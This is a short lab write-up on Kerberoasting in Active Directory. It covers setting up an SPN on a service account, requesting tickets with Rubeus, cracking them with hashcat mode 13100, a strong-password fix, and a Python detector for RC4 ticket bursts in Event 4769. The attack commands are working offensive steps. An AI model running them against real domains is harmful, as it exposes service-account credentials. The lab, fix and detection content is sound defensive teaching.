Kerberoasting

Making the Lab

Set up a general AD lab.
Add a new user called SQLService.
Open a cmd prompt on the DC and register an SPN for the account:

setspn -a <DC-NAME>/SQLService.<domain>.local:60111 <DOMAIN>\SQLService

You can then verify that the SPN can be found by querying all SPNs in the domain:

setspn -T <DOMAIN>.local -Q */*

Abuse

Rubeus is the simplest way to request service tickets for every account with an SPN:

rubeus.exe kerberoast /simple /nowrap

Then use Hashcat to crack the hash (mode 13100 is Kerberos 5 TGS-REP etype 23, i.e. RC4-HMAC):

hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force

Fixing

You could remove the SPN from the account, but that would break whatever service relies on it.
The real fix is to use a strong password for the service account, since the cracking step above is only as fast as the password is weak. It can be changed with:

net user SQLService NewPasswordThatShouldBeStrong
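On the detection side, the Rubeus step above requests a TGS for many SPN-bearing accounts within seconds and asks for RC4-HMAC, which shows up in Windows Security Event 4769 as TicketEncryptionType 0x17. The script below is an added example (not from the original note, Rubeus or Microsoft) that flags one requester pulling RC4 tickets for several distinct service accounts in a short window; the event records, account names and thresholds are constructed.

```python
"""Flag Kerberoasting-style bursts in Windows Security Event 4769 records.

Added example for the Kerberoasting note, not code from the page or from
Rubeus. Roasting tooling requests a TGS for many SPN accounts in a short
window and asks for RC4-HMAC (TicketEncryptionType 0x17), so we look for one
requesting account pulling RC4 tickets for several distinct service accounts
within a few minutes. All events below are constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 records: (time, requesting account, service name, etype)
EVENTS = [
    ("2024-01-10 09:00:01", "alice@LAB.LOCAL", "krbtgt", "0x12"),
    ("2024-01-10 09:00:03", "alice@LAB.LOCAL", "DC01$", "0x12"),
    ("2024-01-10 09:02:10", "bob@LAB.LOCAL", "SQLService", "0x17"),
    ("2024-01-10 09:02:11", "bob@LAB.LOCAL", "WebService", "0x17"),
    ("2024-01-10 09:02:11", "bob@LAB.LOCAL", "BackupSvc", "0x17"),
    ("2024-01-10 09:02:12", "bob@LAB.LOCAL", "ReportSvc", "0x17"),
    ("2024-01-10 13:30:00", "carol@LAB.LOCAL", "SQLService", "0x17"),
]

RC4_HMAC = "0x17"


def is_roastable(service: str) -> bool:
    """Machine accounts (trailing $) and krbtgt are excluded from roast lists."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_kerberoast_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Return {account: sorted distinct services} for accounts that requested
    RC4 tickets for at least `threshold` distinct roastable services inside
    any `window`-long interval."""
    by_user = defaultdict(list)
    for ts, user, service, etype in events:
        if etype == RC4_HMAC and is_roastable(service):
            by_user[user].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), service))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            # Sliding window: distinct services requested within `window` of request i
            seen = {s for t, s in reqs[i:] if t - start <= window}
            if len(seen) >= threshold:
                hits[user] = sorted(seen)
                break
    return hits


if __name__ == "__main__":
    for user, services in find_kerberoast_bursts(EVENTS).items():
        print(f"possible kerberoast by {user}: {', '.join(services)}")
```

A single RC4 request (carol above) is normal for legacy clients and is not flagged; tune `window` and `threshold` to the environment's baseline before alerting on it.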